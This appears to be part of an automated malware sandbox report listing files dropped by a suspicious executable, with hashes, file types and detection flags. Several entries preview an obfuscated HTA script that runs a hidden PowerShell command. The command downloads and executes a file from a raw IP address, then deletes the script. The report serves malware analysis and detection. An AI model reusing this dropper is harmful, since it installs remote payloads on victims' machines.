                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10307
                                                                                                                                                                                                                                                    Entropy (8bit):5.499938759131961
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:nAngRHBE1ibqp67PQ77QCVUgaXQ6iKK/4z3NBw8D8kSl:njAiQPQCVUJi/8fw9k0
                                                                                                                                                                                                                                                    MD5:3689683C20BBA57B8844A42FF5EBD9C1
                                                                                                                                                                                                                                                    SHA1:6659237CF9F919DB356FF565168266BF32315149
                                                                                                                                                                                                                                                    SHA-256:288DB1D8AEA9CDA0DE68FDD2D6A816FA48CD8A7E2427B7159D4026666553FBC2
                                                                                                                                                                                                                                                    SHA-512:75A10281DCD2D8342EC7876A1A5D0FE05076CD55AC20B2664026264DA5085DC905B3678EED3EF691BDE5F54531D3734E48D7A330C5645DBE0D99C1C456722A27
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "4cbb0eca-22b0-45bf-8c7b-17c3580947ca");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696503498);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696503523);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                    Entropy (8bit):1.1366744760037832
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cZ/Q4:MnlyfnGtxnfVuSVumEHZY4
                                                                                                                                                                                                                                                    MD5:403AF73130A55F1DF5D5D597717A386C
                                                                                                                                                                                                                                                    SHA1:AA0262EE3F7188D59D5859AF240B725AA9252212
                                                                                                                                                                                                                                                    SHA-256:A225C7166B6841D04F34589DB373472CA34525F88A644B5903733563372642AD
                                                                                                                                                                                                                                                    SHA-512:B70388D614814369D8DB9E4F3F20FB2F16EED5A65893DC7A8872E8FC462A7338F929A0777B4D18B77E1F4A6864CDA790ABD91116C9D1483DFFB64173699EEAEF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                    Entropy (8bit):1.1209935793793442
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                                                                                                                                                                    MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                                                                                                                                                                    SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                                                                                                                                                                    SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                                                                                                                                                                    SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                                    Entropy (8bit):0.03779668081370459
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZh1B++NbBl3D56+9H9HI:58r54w0VW3xWZhW+Ff3AW9
                                                                                                                                                                                                                                                    MD5:F5A3FAA39A2FDA10356E1889BC81EA55
                                                                                                                                                                                                                                                    SHA1:FD4D7CF58C33C8583E45D88A2F89B8F66770644B
                                                                                                                                                                                                                                                    SHA-256:55BDD67E95C3B441AE02D26939E484E14B14550F5A273F3E35ADE569ABA8FAF9
                                                                                                                                                                                                                                                    SHA-512:28766C6C4FCB65CF9B436ED51708FABF3E2D8F8B3344F80B64A93994EE170DBB25025DBDB164A22636C1354139215A8B4181AC35D9E98A9950E9C1ECF1473D7F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                    • Filename: 5EfYBe3nch.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: random.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 8WFJ38EJo5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: w22319us3M.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: 5uVReRlvME.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: DRWgoZo325.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: i8Vwc7iOaG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: glpEv3POe7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: gYjK72gL17.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    • Filename: iUKUR1nUyD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Joe Sandbox View:
• Filename: 5EfYBe3nch.exe, Detection: malicious
• Filename: random.exe, Detection: malicious
• Filename: 8WFJ38EJo5.exe, Detection: malicious
• Filename: w22319us3M.exe, Detection: malicious
• Filename: 5uVReRlvME.exe, Detection: malicious
• Filename: DRWgoZo325.exe, Detection: malicious
• Filename: i8Vwc7iOaG.exe, Detection: malicious
• Filename: glpEv3POe7.exe, Detection: malicious
• Filename: gYjK72gL17.exe, Detection: malicious
• Filename: iUKUR1nUyD.exe, Detection: malicious
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\.gif, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\3GEgnMlRi.txt, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (601), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):956
                                                                                                                                                                                                                                                    Entropy (8bit):4.808412994473198
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:7ZoKJ6HK1rQwoAqc6AVEGbTKNcqfpWmYsCWCD5eByyMEGAvOMv:7ZfJ6LLfxAX3KGqBCFeg9AvRv
                                                                                                                                                                                                                                                    MD5:B8B1EFFB8B550A10283923C32D0F4BDF
                                                                                                                                                                                                                                                    SHA1:163F952333EE8C68BEFE928CC05A435DF26F1D4B
                                                                                                                                                                                                                                                    SHA-256:D775D43DBA4BFA3535C15851F108880D6E10FB58D94A71C6FEF89241AA847C32
                                                                                                                                                                                                                                                    SHA-512:6BBB4B340A641A16FCC7E3C76E0D01917C713C95199F7E3ACE31E720454061D42F5B6C8241A563DF8F7508E4A61139021965B6B8D8DA015972336C546C1EFDC1
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Temp\5ZycQXqae.txt, Author: Joe Security
                                                                                                                                                                                                                                                    Preview:<script>..try {.. moveTo(-100, -100);.. resizeTo(0, 0);.. var a = new ActiveXObject('Wscript.Shell');.. var script = decodeURIComponent("%50%6f%77%65%72%53%68%65%6c%6c%20%2d%57%69%6e%64%6f%77%53%74%79%6c%65%20%48%69%64%64%65%6e%20%24%64%3d%24%65%6e%76%3a%74%65%6d%70%2b%27%5c%34%38%33%64%32%66%61%38%61%30%64%35%33%38%31%38%33%30%36%65%66%65%62%33%32%64%33%2e%65%78%65%27%3b%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31%35%2e%31%31%33%2e%31%36%2f%6d%69%6e%65%2f%72%61%6e%64%6f%6d%2e%65%78%65%27%2c%24%64%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%24%64%3b");.. a.Run(script, 0, false);.. var b = new ActiveXObject('Scripting.FileSystemObject');.. var p = document.location.href;.. p = unescape(p.substr(8));.. if (b.FileExists(p)) b.DeleteFile(p);..} catch (e) {}..close();..</script>..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
                                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):1058
                                                                                                                                                                                                                                                    Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                                                    MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                                                    SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                                                    SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                                                    SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):57863
                                                                                                                                                                                                                                                    Entropy (8bit):6.105228577252102
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kMYyrWoBJ1ZUA93Vp4lTcfAIra8O5jH5iyPP4rLtyR/:z/Ps+wsI7yn6J1HlKxL41j0RGoD
                                                                                                                                                                                                                                                    MD5:DCF13ED381F96306EB5B29E0A66E7A95
                                                                                                                                                                                                                                                    SHA1:86C8CF2EC194E8955EE9497E83F3974A9E75D279
                                                                                                                                                                                                                                                    SHA-256:C9D1771B998059378E6F22D0B99D368E9DE90640C39C90880D8AF38104C8AB90
